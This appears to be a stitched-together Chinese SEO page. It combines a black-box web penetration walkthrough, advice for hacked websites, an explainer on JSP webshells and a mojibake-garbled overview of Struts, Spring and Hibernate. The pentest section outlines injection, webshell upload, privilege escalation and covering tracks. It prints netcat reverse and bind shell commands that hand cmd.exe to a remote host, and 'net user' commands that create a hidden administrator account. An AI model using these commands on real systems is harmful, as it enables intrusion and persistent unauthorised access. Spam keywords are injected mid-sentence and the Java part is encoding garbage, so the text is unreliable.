1.web渗透是码审什么?
2.网站被黑客攻击怎么办
3.jsp大马是什么意思?
4.java webå¼å ä¼çè¿
web渗透是什么?
Web渗透测试分为白盒测试和黑盒测试,白盒测试是码审指目标网站的源码等信息的情况下对其渗透,相当于代码分析审计。码审而黑盒测试则是码审在对该网站系统信息不知情的情况下渗透,以下所说的码审Web渗透就是黑盒渗透。
Web渗透分为以下几个步骤,码审dbdk源码信息收集,码审漏洞扫描,码审漏洞利用,码审提权,码审内网渗透,码审留后门,码审清理痕迹。码审一般的码审渗透思路就是看是否有注入漏洞,然后注入得到后台管理员账号密码,码审登录后台,上传小马,再通过小马上传大马,提权,内网转发,打包网站源码进行内网渗透,扫描内网c段存活主机及开放端口,看其主机有无可利用漏洞(nessus)端口(nmap)对应服务及可能存在的漏洞,对其利用(msf)拿下内网,留下后门,清理痕迹。或者看是否有上传文件的地方,上传一句话木马,再用菜刀链接,拿到数据库并可执行cmd命令,可继续上大马.........思路很多,很多时候成不成功可能就是一个思路的问题,技术可以不高,思路一定得骚。
信息收集
信息收集是整个流程的重中之重,前期信息收集的越多,Web渗透的成功率就越高。
DNS域名信息:通过url获取其真实ip,子域名(Layer子域名爆破机),旁站(K8旁站,php源码模板御剑1.5),c段,网站负责人及其信息(whois查询)
整站信息:服务器操作系统、服务器类型及版本(Apache/Nginx/Tomcat/IIS)、数据库类型(Mysql/Oracle/Accees/Mqlserver)、脚本类型(php/jsp/asp/aspx)、CMS类型;
网站常见搭配为:
ASP和ASPX:ACCESS、SQLServer
PHP:MySQL、PostgreSQL
JSP:Oracle、MySQL
敏感目录信息(御剑,dirbust)
开放端口信息(nmp)
漏洞扫描
利用AWVS,AppScan,OWASP-ZAP,等可对网站进行网站漏洞的初步扫描,看其是否有可利用漏洞。
常见漏洞:
SQL注入
XSS跨站脚本
CSRF跨站请求伪造
XXE(XML外部实体注入)漏洞
SSRF(服务端请求伪造)漏洞
文件包含漏洞
文件上传漏洞
文件解析漏洞
远程代码执行漏洞
CORS跨域资源共享漏洞
越权访问漏洞
目录遍历漏洞和任意文件读取/下载漏洞
漏洞利用
用工具也好什么也好对相应漏洞进行利用
如:
Sql注入(sqlmap)
XSS(BEEF)
后台密码爆破(burp)
端口爆破(hydra)
提权
获得shell之后我们权限可能很低,因此要对自己提权,可以根据服务器版本对应的exp进行提权,对于Windows系统也可看其补丁对应漏洞的exp进行提权
内网渗透
首先进行端口转发可用nc
nc使用方法:
反向连接
在公网主机上进行监听:
nc-lvp
在内网主机上执行:
nc-e cmd.exe 公网主机ip
成功之后即可得到一个内网主机shell
正向连接
远程主机上执行:
nc-l -p -t -e cmd.exe
本地主机上执行:
nc-vv 远程主机ip
成功后,本地主机即可远程主机的一个shell
然后就是对内网进行渗透了,可以用主机漏洞扫描工具(nessus,x-scan等)进行扫描看是否有可用漏洞,可用msf进行利用,交易猫源码或者用nmap扫描存活主机及开放端口,可用hydra进行端口爆破或者用msf对端口对应漏洞得到shell拿下内网留后门
留后门
对于网站上传一句话木马,留下后门
对于windows用户可用hideadmin创建一个超级隐藏账户
手工:
netuser test$ /add
netlocalgroup administrators test$ /add
这样的话在cmd命令中看不到,但在控制面板可以看到,还需要改注册表才能实现控制版面也看不到,太过麻烦,不多赘述,所以还是用工具省心省力。
网站被黑客攻击怎么办
网站上面有很多吸引我们的地方,但是网站上面也埋伏着黑客的身影,那网站被黑客攻击怎么办了解网络安全常识,首先就要了解常见电脑黑客攻击类型与预防方
法,下面裕祥安全网
小编就带您认识一下吧。
方法
1、确认被攻击的范围网站被篡改,可能攻击都只有网站的权限就是常说的Webshell,也有可能攻击者通过Webshell提权,已经获取到服务器的权限,甚至已经渗透到内网。所以你通过日志等迹象来判断和确认攻击的空间人气源码范围。
2、备份日志备份日志(如IIS、apache、FTP、Windows/Linux/Unix等日志)。也许部份日志已经被黑客清除,可以通过日志恢复等方法,尽量找到更多的日志。如果有大的损失,完全可以报警,这时候日志就发挥重要作用了,办案人员可以通过日志寻找入侵者的行踪。日志还有一个重要作用就是或许可以找到黑客攻击该网站时使用的方法,并从中寻找漏洞所在。
3、清除后门程序一般黑客会为了长期巩固“成果”,会安装各种后门程序如asp、aspx、php、jsp、cgi、py等脚本木马。如果黑客已经获取到服务器权限,那么你就检查基于系统的后门如Rootkit、反弹远程控制木马,检查黑客是否替换程序、克隆管理员账号等。
4、修复漏洞仅仅清除后门是不够的,必须找到漏洞所在,这才是从根本上解决安全问题,这个过程难度是最高的,一般会涉及到开发,需要具有丰富经验的安全人员才能解决。
5、更改原来配置修复漏洞后,我们需要更改一些以前的配置文件,如网站后台密码、数据库连接密码、如果是ACCESS、ASA等格式数据库需要变更路径或者文件名,这样的目的就是防止黑客通过以前的记录信息,再次入侵,同时更改Administrator、Root等管理员密码。
网站防黑建议
1、渗透性测试如果有条件可以聘请安全人员进行渗透性测试,或者聘请专业的安全人员维护。
提示:渗透性测试是经过授权后,安全人员模拟黑客攻击,来寻找网络、服务器、网站的脆弱点和漏洞,并且给予相应的安全解决方案。
2、加强安全意识假若有层层的安全设备保护网站,并且网站源码通过专业的安全审计,如果网站后台密码或者FTP口令设置成,那么再好的防护也是没有用的。
关于网络安全小知识
,小编为您介绍和普及这么多了,看完上面的介绍,您对“网站被黑客攻击怎么办”这个问题了解多少了呢为了保证我们的正常生活,我们在上网的时候还是尽量远离一些不正常的网站,以免被黑客钓鱼进行攻击。
jsp大马是什么意思?
JSP(JavaServer Pages)大马,指的是一种基于JSP技术的Web后门程序。这种后门程序可以让黑客在网站服务器上进行非法操作,例如远程控制、上传恶意代码等。JSP大马利用了服务器端解析JSP文件的机制,将后门代码嵌入到网站的JSP文件中,然后通过访问该文件来实现入侵。由于JSP大马可以绕过一些常见的安全防护措施,因此在Web安全领域备受关注。
JSP大马被黑客利用后,可以给网站带来严重危害。黑客可以通过JSP大马获取网站的管理员权限,或者上传恶意文件来危害用户安全。例如,黑客可以在网站上植入木马、挂钩、病毒等恶意代码,让用户的计算机感染,进而攻击其他网站或进行窃密行为。此外,黑客还可以利用JSP大马**网站的敏感信息,造成隐私泄露等问题。
防范JSP大马攻击需要多种手段的综合使用。首先,建议企业采用严格的权限控制和代码审计机制,规范开发人员的操作,防止恶意代码的上传和运行。其次,可以利用安全扫描工具对网站进行定期扫描,及时发现和修复漏洞。最后,部署安全防护设备,包括WAF(Web应用程序防火墙)、IDS(入侵检测系统)等,及时发现和阻止JSP大马攻击。除此之外,企业还应定期组织员工进行安全意识培训,提升员工的安全意识,共同维护网络安全。
java webå¼å ä¼çè¿
å¦æè¿è¡Webå¼åï¼å ¨é¨ç¨JSPåJavaæ¥å®ç°ï¼ä¹æ¯å¯ä»¥çãä½æ¯ä½ ç代ç ä¼é常å¤æï¼å®ç°èµ·æ¥å¾éº»ç¦ï¼ä»ä¹é½æé头åã使ç¨SSHä¸å¤§æ¡æ¶ï¼å ¶å®æ¯æå¾å¤å¥½å¤çãä¼å°è£ å¾å¤å®ç°ï¼ä½ å ·ä½å¼åæ¶ï¼å°±è½æ¯è¾è½»æ¾ãä½æ¯SSHæ¡æ¶é 置对äºåå¦è è¿æ¯æ¯è¾å¤æçã
Strutsçåçåä¼ç¹.
Strutså·¥ä½åç
MVCå³Model-View-Controllerç缩åï¼æ¯ä¸ç§å¸¸ç¨ç设计模å¼ãMVC åå¼±äºä¸å¡é»è¾æ¥å£åæ°æ®æ¥å£ä¹é´çè¦åï¼ä»¥å让è§å¾å±æ´å¯äºååãMVCçå·¥ä½åç,å¦ä¸å¾1æç¤ºï¼ Struts æ¯MVCçä¸ç§å®ç°ï¼å®å° Servletå JSP æ è®°ï¼å±äº J2EE è§èï¼ç¨ä½å®ç°çä¸é¨åãStruts继æ¿äºMVCçå项ç¹æ§ï¼å¹¶æ ¹æ®J2EEçç¹ç¹ï¼åäºç¸åºçååä¸æ©å±ãStrutsçå·¥ä½åçï¼
è§å¾ï¼ä¸»è¦ç±JSPçæ页é¢å®æè§å¾ï¼Strutsæä¾ä¸°å¯çJSP æ ç¾åºï¼ Htmlï¼Beanï¼Logicï¼Templateçï¼è¿æå©äºåå¼è¡¨ç°é»è¾åç¨åºé»è¾ã
æ§å¶ï¼å¨Strutsä¸ï¼æ¿æ MVCä¸Controllerè§è²çæ¯ä¸ä¸ªServletï¼å«ActionServletãActionServletæ¯ä¸ä¸ªéç¨çæ§å¶ç»ä»¶ãè¿ä¸ªæ§å¶ç»ä»¶æä¾äºå¤çææåéå°StrutsçHTTP请æ±çå ¥å£ç¹ãå®æªååååè¿äºè¯·æ±å°ç¸åºçå¨ä½ç±»ï¼è¿äºå¨ä½ç±»é½æ¯Actionç±»çåç±»ï¼ãå¦å¤æ§å¶ç»ä»¶ä¹è´è´£ç¨ç¸åºç请æ±åæ°å¡«å Action Fromï¼é常称ä¹ä¸ºFromBeanï¼,å¹¶ä¼ ç»å¨ä½ç±»ï¼é常称ä¹ä¸ºActionBeanï¼ãå¨ä½ç±»å®ç°æ ¸å¿åä¸é»è¾ï¼å®å¯ä»¥è®¿é®java bean æè°ç¨EJBãæåå¨ä½ç±»ææ§å¶æä¼ ç»åç»çJSP æ件ï¼åè çæè§å¾ãææè¿äºæ§å¶é»è¾å©ç¨Struts-config.xmlæ件æ¥é ç½®ã
模åï¼æ¨¡å以ä¸ä¸ªæå¤ä¸ªjava beançå½¢å¼åå¨ãè¿äºbeanå为ä¸ç±»ï¼Action FormãActionãJavaBean or EJBãAction Formé常称ä¹ä¸ºFormBeanï¼å°è£ äºæ¥èªäºClientçç¨æ·è¯·æ±ä¿¡æ¯ï¼å¦è¡¨åä¿¡æ¯ãActioné常称ä¹ä¸ºActionBeanï¼è·åä»ActionSevletä¼ æ¥çFormBeanï¼ååºFormBeanä¸çç¸å ³ä¿¡æ¯ï¼å¹¶ååºç¸å ³çå¤çï¼ä¸è¬æ¯è°ç¨Java BeanæEJBçã
æµç¨ï¼å¨Strutsä¸ï¼ç¨æ·ç请æ±ä¸è¬ä»¥*.doä½ä¸ºè¯·æ±æå¡åï¼ææç*.do请æ±å被æåActionSevletï¼ActionSevletæ ¹æ®Struts-config.xmlä¸çé 置信æ¯ï¼å°ç¨æ·è¯·æ±å°è£ æä¸ä¸ªæå®å称çFormBeanï¼å¹¶å°æ¤FormBeanä¼ è³æå®å称çActionBeanï¼ç±ActionBeanå®æç¸åºçä¸å¡æä½ï¼å¦æ件æä½ï¼æ°æ®åºæä½çãæ¯ä¸ä¸ª*.doåæ对åºçFormBeanå称åActionBeanå称ï¼è¿äºå¨Struts-config.xmlä¸é ç½®ã
æ ¸å¿ï¼Strutsçæ ¸å¿æ¯ActionSevletï¼ActionSevletçæ ¸å¿æ¯Struts-config.xmlã
Strutsä¼ç¼ºç¹
ä¼ç¹ï¼ 1. å¼æºè½¯ä»¶ï¼è½æ´æ·±å ¥çäºè§£å ¶å é¨å®ç°æºå¶ã 2.Taglib æ è®°åºï¼çµæ´»å¨ç¨ï¼è½å¤§å¤§æé«å¼åæçã
3.页é¢å¯¼èªä½¿ç³»ç»çèç»æ´å æ¸ æ°ãéè¿ä¸ä¸ªé ç½®æ件ï¼å³å¯ææ¡æ´ä¸ªç³»ç»åé¨åä¹é´çèç³»ï¼è¿å¯¹äºåæçç»´æ¤æçè«å¤§ç好å¤ãå°¤å ¶æ¯å½å¦ä¸æ¹å¼åè æ¥æè¿ä¸ªé¡¹ç®æ¶ï¼è¿ç§ä¼å¿ä½ç°å¾æ´å ææ¾ã
4. æä¾Exceptionå¤çæºå¶ . 5. æ°æ®åºé¾æ¥æ± 管ç
6. Struts çActionå¿ éæ¯threadï¼safeæ¹å¼ï¼å®ä» ä» å 许ä¸ä¸ªå®ä¾å»å¤çææç请æ±ãæ以actionç¨å°çææçèµæºé½å¿ éç»ä¸åæ¥ï¼è¿ä¸ªå°±å¼èµ·äºçº¿ç¨å®å ¨çé®é¢ã 缺ç¹ï¼ Taglib æ¯Strutsçä¸å¤§ä¼å¿ï¼ä½å¯¹äºåå¦è èè¨ï¼å´éè¦ä¸ä¸ªæç»å¦ä¹ çè¿ç¨ï¼çè³è¿ä¼æä¹±ä½ ç½é¡µç¼åçä¹ æ¯ï¼ä½æ¯ï¼å½ä½ ä¹ æ¯äºå®æ¶ï¼ä½ ä¼è§å¾å®ççå¾æ£ã Struts å°MVCçControllerä¸å为ä¸ï¼å¨è·å¾ç»ææ´å æ¸ æ°çåæ¶ï¼ä¹å¢å äºç³»ç»çå¤æ度ã ActionForms 使ç¨ä¸ä¾¿ãæ æ³è¿è¡åå æµè¯ï¼StrutsTestCaseåªè½ç¨äºéæï¼
Springçåçåä¼ç¹
Springçæ£çç²¾åæ¯å®ç Iocæ¨¡å¼ å®ç°çBeanFactoryå AOP ï¼å®èªå·±å¨è¿ä¸ªåºç¡ä¸å»¶ä¼¸çåè½æäºç»è添足ã
Ioc模å¼æ¯ä»ä¹
å¯ä¼¸ç¼©æ§åé/è½»éï¼è°æ¯å®ç¨ç³»ç»çæ¶æ主éï¼
Springå®æ¯ä¸ä¸ªå¼æºç项ç®ï¼èä¸ç®åé常活è·ï¼å®åºäºIoCï¼Inversion of Controlï¼ååæ§å¶ï¼åAOPçææ¶å¤å±j2eeç³»ç»çæ¡æ¶ï¼ä½å®ä¸å¼ºè¿«ä½ å¿ é¡»å¨æ¯ä¸å± ä¸å¿ 须使ç¨Springï¼å 为å®æ¨¡ååçå¾å¥½ï¼å è®¸ä½ æ ¹æ®èªå·±çéè¦éæ©ä½¿ç¨å®çæä¸ä¸ªæ¨¡åï¼å®å®ç°äºå¾ä¼é çMVCï¼å¯¹ä¸åçæ°æ®è®¿é®ææ¯æä¾äºç»ä¸ç æ¥å£ï¼éç¨IoC使å¾å¯ä»¥å¾å®¹æçå®ç°beançè£ é ï¼æä¾äºç®æ´çAOP并æ®æ¤å®ç°Transcation Managmentï¼çç
ä¼ç¹
a. Springè½ææå°ç»ç»ä½ çä¸é´å±å¯¹è±¡ï¼ä¸ç®¡ä½ æ¯å¦éæ©ä½¿ç¨äºEJBãå¦æä½ ä» ä» ä½¿ç¨äºStrutsæå ¶ä»ä¸ºJ2EEç APIç¹å¶çframeworkï¼Springè´åäºè§£å³å©ä¸çé®é¢ã b. Springè½æ¶é¤å¨è®¸å¤å·¥ç¨ä¸å¸¸è§ç对Singletonçè¿å¤ä½¿ç¨ãæ ¹æ®æçç»éªï¼è¿æ¯ä¸ä¸ªå¾å¤§çé®é¢ï¼å®éä½äºç³»ç»çå¯æµè¯æ§åé¢å对象çç¨åº¦ã c. éè¿ä¸ç§å¨ä¸ååºç¨ç¨åºå项ç®é´ä¸è´çæ¹æ³æ¥å¤çé ç½®æ件ï¼Springè½æ¶é¤åç§åæ ·èªå®ä¹æ ¼å¼çå±æ§æ件çéè¦ãæ¾ç»å¯¹æ个类è¦å¯»æ¾çæ¯åªä¸ªéæ³è¬çå±æ§é¡¹æç³»ç»å±æ§æå°ä¸è§£ï¼ä¸ºæ¤ä¸å¾ä¸å»è¯»Javadocçè³æºç¼ç ï¼æäºSpringï¼ä½ ä» ä» éè¦ççç±»çJavaBeanå±æ§ãInversion of Controlç使ç¨ï¼å¨ä¸é¢è®¨è®ºï¼å¸®å©å®æäºè¿ç§ç®åã d.? éè¿æ对æ¥å£ç¼ç¨èä¸æ¯å¯¹ç±»ç¼ç¨ç代价å ä¹åå°å°æ²¡æï¼Springè½å¤ä¿è¿å »æ好çç¼ç¨ä¹ æ¯ã e. Spring被设计为让使ç¨å®å建çåºç¨å°½å¯è½å°çä¾èµäºä»çAPIsãå¨Springåºç¨ä¸ç大å¤æ°ä¸å¡å¯¹è±¡æ²¡æä¾èµäºSpringã f. 使ç¨Springæ建çåºç¨ç¨åºæäºåå æµè¯ã g. Springè½ä½¿EJBç使ç¨æ为ä¸ä¸ªå®ç°éæ©,èä¸æ¯åºç¨æ¶æçå¿ ç¶éæ©ãä½ è½éæ©ç¨POJOsælocal EJBsæ¥å®ç°ä¸å¡æ¥å£ï¼å´ä¸ä¼å½±åè°ç¨ä»£ç ã h. Spring帮å©ä½ 解å³è®¸å¤é®é¢èæ é使ç¨EJBãSpringè½æä¾ä¸ç§EJBçæ¿æ¢ç©ï¼å®ä»¬éç¨äºè®¸å¤webåºç¨ãä¾å¦ï¼Springè½ä½¿ç¨AOPæä¾å£°ææ§äºå¡ç®¡çèä¸éè¿EJB容å¨ï¼å¦æä½ ä» ä» éè¦ä¸å个æ°æ®åºæ交éï¼çè³ä¸éè¦ä¸ä¸ªJTAå®ç°ã i. Spring为æ°æ®ååæä¾äºä¸ä¸ªä¸è´çæ¡æ¶,ä¸è®ºæ¯ä½¿ç¨çæ¯JDBCè¿æ¯O/R mapping产åï¼å¦Hibernateï¼ã Springç¡®å®ä½¿ä½ è½éè¿æç®åå¯è¡ç解å³åæ³æ¥è§£å³ä½ çé®é¢ãèè¿æ¯ææå¾å¤§ä»·å¼çã 缺ç¹ï¼ä½¿ç¨äººæ°ä¸å¤ãjspä¸è¦åå¾å¤ä»£ç ãæ§å¶å¨è¿äºçµæ´»ï¼ç¼ºå°ä¸ä¸ªå ¬ç¨æ§å¶å¨
Hibernateçåçåä¼ç¹ã
Hibernate使ç¨äºJ2EEæ¶æä¸çå¦ä¸ææ¯ï¼JDBCãJTAãJNDIãå ¶ä¸JDBCæ¯ä¸ä¸ªæ¯æå ³ç³»æ°æ®åºæä½çä¸ä¸ªåºç¡å±ï¼å®ä¸JNDIåJTAä¸èµ·ç»åï¼ä½¿å¾Hibernateå¯ä»¥æ¹ä¾¿å°éæå°J2EEåºç¨æå¡å¨ä¸å»ã å¨è¿éï¼æ们ä¸ä¼è¯¦ç»å°å»è®¨è®ºHibernate APIæ¥å£ä¸çæææ¹æ³ï¼æ们åªç®è¦è®²ä¸ä¸æ¯ä¸ªä¸»è¦æ¥å£çåè½ï¼å¦æä½ æ³äºè§£å¾æ´å¤çè¯ï¼ä½ å¯ä»¥å¨Hibernateçæºç å ä¸çnet.sf.hibernateåå ä¸å»æ¥çè¿äºæ¥å£çæºä»£ç ãä¸é¢æ们ä¾æ¬¡è®²ä¸ä¸ææç主è¦æ¥å£ï¼ æ ¸å¿æ¥å£ 以ä¸5ä¸ªæ ¸å¿æ¥å£å ä¹å¨ä»»ä½å®é å¼åä¸é½ä¼ç¨å°ãéè¿è¿äºæ¥å£ï¼ä½ ä¸ä» å¯ä»¥åå¨åè·å¾æä¹ å¯¹è±¡ï¼å¹¶ä¸è½å¤è¿è¡äºå¡æ§å¶ã
Sessionæ¥å£ Sessionæ¥å£å¯¹äºHibernate å¼å人åæ¥è¯´æ¯ä¸ä¸ªæéè¦çæ¥å£ãç¶èå¨Hibernateä¸ï¼å®ä¾åçSessionæ¯ä¸ä¸ªè½»é级çç±»ï¼å建åéæ¯å®é½ä¸ä¼å ç¨å¾å¤èµæºãè¿å¨å®é 项ç®ä¸ç¡®å®å¾éè¦ï¼å 为å¨å®¢æ·ç¨åºä¸ï¼å¯è½ä¼ä¸æå°å建以åéæ¯Session对象ï¼å¦æSessionçå¼é太大ï¼ä¼ç»ç³»ç»å¸¦æ¥ä¸è¯å½±åã
SessionFactory æ¥å£ è¿éç¨å°äºä¸ä¸ªè®¾è®¡æ¨¡å¼ââå·¥å模å¼ï¼ç¨æ·ç¨åºä»å·¥åç±»SessionFactoryä¸åå¾Sessionçå®ä¾ã ä»¤ä½ æå°å¥æªçæ¯SessionFactory并ä¸æ¯è½»é级çï¼å®é ä¸å®ç设计è çæå¾æ¯è®©å®è½å¨æ´ä¸ªåºç¨ä¸å ±äº«ãå ¸åå°æ¥è¯´ï¼ä¸ä¸ªé¡¹ç®é常åªéè¦ä¸ä¸ªSessionFactoryå°±å¤äºï¼ä½æ¯å½ä½ ç项ç®è¦æä½å¤ä¸ªæ°æ®åºæ¶ï¼é£ä½ å¿ é¡»ä¸ºæ¯ä¸ªæ°æ®åºæå®ä¸ä¸ªSessionFactoryã SessionFactoryå¨Hibernateä¸å®é èµ·å°äºä¸ä¸ªç¼å²åºçä½ç¨ï¼å®ç¼å²äºHibernateèªå¨çæçSQLè¯å¥åä¸äºå ¶å®çæ å°æ°æ®ï¼è¿ç¼å²äºä¸äºå°æ¥æå¯è½éå¤å©ç¨çæ°æ®ã
Configuration æ¥å£ Configurationæ¥å£çä½ç¨æ¯å¯¹Hibernateè¿è¡é ç½®ï¼ä»¥å对å®è¿è¡å¯å¨ãå¨Hibernateçå¯å¨è¿ç¨ä¸ï¼Configurationç±»çå®ä¾é¦å å®ä½æ å°ææ¡£çä½ç½®ï¼è¯»åè¿äºé ç½®ï¼ç¶åå建ä¸ä¸ªSessionFactory对象ã
QueryåCriteriaæ¥å£ Queryæ¥å£è®©ä½ æ¹ä¾¿å°å¯¹æ°æ®åºåæä¹ å¯¹è±¡è¿è¡æ¥è¯¢ï¼å®å¯ä»¥æ两ç§è¡¨è¾¾æ¹å¼ï¼HQLè¯è¨ææ¬å°æ°æ®åºçSQLè¯å¥ãQueryç»å¸¸è¢«ç¨æ¥ç»å®æ¥è¯¢åæ°ãéå¶æ¥è¯¢è®°å½æ°éï¼å¹¶æç»æ§è¡æ¥è¯¢æä½ã Criteriaæ¥å£ä¸Queryæ¥å£é常类似ï¼å®å è®¸ä½ å建并æ§è¡é¢å对象çæ ååæ¥è¯¢ã å¼å¾æ³¨æçæ¯Queryæ¥å£ä¹æ¯è½»é级çï¼å®ä¸è½å¨Sessionä¹å¤ä½¿ç¨ã
Callback æ¥å£ å½ä¸äºæç¨çäºä»¶åçæ¶ââä¾å¦æä¹ å¯¹è±¡çè½½å ¥ãåå¨ãå é¤æ¶ï¼Callbackæ¥å£ä¼éç¥Hibernateå»æ¥æ¶ä¸ä¸ªéç¥æ¶æ¯ãä¸è¬èè¨ï¼Callbackæ¥å£å¨ç¨æ·ç¨åºä¸å¹¶ä¸æ¯å¿ é¡»çï¼ä½ä½ è¦å¨ä½ ç项ç®ä¸å建审计æ¥å¿æ¶ï¼ä½ å¯è½ä¼ç¨å°å®ã以ä¸æ¯å®ççç¥æ¥å£ï¼
· 主é®ççæ (IdentifierGenerator æ¥å£)
· æ¬å°SQLè¯è¨æ¯æ (Dialect æ½è±¡ç±»)
· ç¼å²æºå¶ (Cache åCacheProvider æ¥å£)
· JDBC è¿æ¥ç®¡ç (ConnectionProvideræ¥å£)
.äºå¡ç®¡ç (TransactionFactory, Transaction, å TransactionManagerLookup æ¥å£)
· ORM çç¥ (ClassPersister æ¥å£)
· å±æ§è®¿é®çç¥ (PropertyAccessor æ¥å£)
· 代ç对象çå建 (ProxyFactoryæ¥å£)
Hibernate为以ä¸æåçæºå¶åå«å建äºä¸ä¸ªç¼ºççå®ç°ï¼å æ¤å¦æä½ åªæ¯è¦å¢å¼ºå®çæ个çç¥çåè½çè¯ï¼åªéç®åå°ç»§æ¿è¿ä¸ªç±»å°±å¯ä»¥äºï¼æ²¡æå¿ è¦ä»å¤´å¼å§å代ç ã
Hibernateè¿è¡å¨ä¸¤ç§ç¯å¢ä¸ï¼å¯ç®¡çç¯å¢åä¸å¯ç®¡çç¯å¢
· å¯ç®¡çç¯å¢ââè¿ç§ç¯å¢å¯ç®¡çå¦ä¸èµæºï¼æ± èµæºç®¡çï¼è¯¸å¦æ°æ®åºè¿æ¥æ± åï¼è¿æäºå¡ç®¡çãå®å ¨å®ä¹ãä¸äºå ¸åçJ2EEæå¡å¨ï¼JBossãWeblogicãWebSphereï¼å·²ç»å®ç°äºè¿äºã
· ä¸å¯ç®¡çç¯å¢ââåªæ¯æä¾äºä¸äºåºæ¬çåè½ï¼è¯¸å¦åJettyæTomcatè¿æ ·çservlet容å¨ç¯å¢ã
ä¼ç¹ï¼
Hibernateæ¯JDBCçè½»é级ç对象å°è£ ï¼å®æ¯ä¸ä¸ªç¬ç«ç对象æä¹ å±æ¡æ¶ãHibernateå¯ä»¥ç¨å¨ä»»ä½JDBCå¯ä»¥ä½¿ç¨çåºåï¼ä¾å¦Javaåºç¨ç¨åºçæ°æ®åºè®¿é®ä»£ç ï¼DAOæ¥å£çå®ç°ç±»ï¼çè³å¯ä»¥æ¯BMPéé¢ç访é®æ°æ®åºç代ç ã
Hibernateæ¯ä¸ä¸ªåJDBCå¯åå ³èçæ¡æ¶ï¼æ以Hibernateçå ¼å®¹æ§åJDBC驱å¨ï¼åæ°æ®åºé½æä¸å®çå ³ç³»ï¼ä½æ¯å使ç¨å®çJavaç¨åºï¼åApp Server没æä»»ä½å ³ç³»ï¼ä¹ä¸åå¨å ¼å®¹æ§é®é¢ã
Hibernateä¸è½ç¨æ¥ç´æ¥åEntity Beanå对æ¯ï¼åªææ¾å¨æ´ä¸ªJ2EE项ç®çæ¡æ¶ä¸æè½æ¯è¾ã并ä¸å³ä½¿æ¯æ¾å¨è½¯ä»¶æ´ä½æ¡æ¶ä¸æ¥çï¼Hibernateä¹æ¯å为JDBCçæ¿ä»£è åºç°çï¼èä¸æ¯Entity Beançæ¿ä»£è åºç°çï¼
Hibernateæ¯ä¸ä¸ªå¼æ¾æºä»£ç çå¯¹è±¡å ³ç³»æ å°æ¡æ¶ï¼å®å¯¹JDBCè¿è¡äºé常轻é级ç对象å°è£ ï¼ä½¿å¾Javaç¨åºåå¯ä»¥éå¿æ欲ç使ç¨å¯¹è±¡ç¼ç¨æç»´æ¥æ纵æ°æ®åºã
Hibernateå¯ä»¥åºç¨å¨ä»»ä½ä½¿ç¨JDBCçåºåã
Hibernate ä½¿ç¨ Java åå°æºå¶ èä¸æ¯åèç å¢å¼ºç¨åºæ¥å®ç°éææ§ã
Hibernate çæ§è½é常好ï¼å 为å®æ¯ä¸ªè½»é级æ¡æ¶ã æ å°ççµæ´»æ§å¾åºè²ã
å®æ¯æåç§å ³ç³»æ°æ®åºï¼ä»ä¸å¯¹ä¸å°å¤å¯¹å¤çåç§å¤æå ³ç³»ã 缺ç¹ï¼å®éå¶æ¨æ使ç¨ç对象模åã(ä¾å¦ï¼ä¸ä¸ªæä¹ æ§ç±»ä¸è½æ å°å°å¤ä¸ªè¡¨)ã
让æååä¸æ¬¡æå·²ç»ån次çæ¡æ¶ç»æï¼
ä¼ ç»çæ¶æï¼ 1) Session Bean Entity Bean DB
为äºè§£å³æ§è½éç¢çæ¿ä»£æ¶æï¼ 2) Session Bean DAO JDBC DB
使ç¨Hibernateæ¥æé«ä¸é¢æ¶æçå¼åæççæ¶æï¼ 3) Session Bean DAO Hibernate DB
å°±ä¸é¢3个æ¶ææ¥åæï¼ 1 ãå åæ¶èï¼éç¨JDBCçæ¶æ2æ çæ¯æçå åçï¼Hibernateçæ¶æ次ä¹ï¼EBçæ¶æ1æå·®ã 2 ãè¿è¡æçï¼å¦æJDBCç代ç åçé常ä¼åï¼é£ä¹JDBCæ¶æè¿è¡æçæé«ï¼ä½æ¯å®é 项ç®ä¸ï¼è¿ä¸ç¹å ä¹åä¸å°ï¼è¿éè¦ç¨åºåé常精éJDBCï¼è¿ç¨Batchè¯å¥ï¼è°æ´PreapredStatementçBatch SizeåFetch Sizeçåæ°ï¼ä»¥åå¨å¿ è¦çæ åµä¸éç¨ç»æécacheççãèä¸è¬æ åµä¸ç¨åºåæ¯åä¸å°è¿ä¸ç¹çãå æ¤Hibernateæ¶æ表ç°åºæå¿«çè¿è¡æçãEBçæ¶ææçä¼å·®çå¾è¿ã 3 ãå¼åæçï¼å¨æJBuilderçæ¯æä¸ä»¥åç®åç项ç®ï¼EBæ¶æå¼åæçæé«ï¼JDBC次ä¹ï¼Hibernateæå·®ãä½æ¯å¨å¤§ç项ç®ï¼ç¹å«æ¯æä¹ å±å ³ç³»æ å°å¾å¤æçæ åµä¸ï¼Hibernateæçé«çæ人ï¼JDBC次ä¹ï¼èEBæ¶æå¾å¯è½ä¼å¤±è´¥ã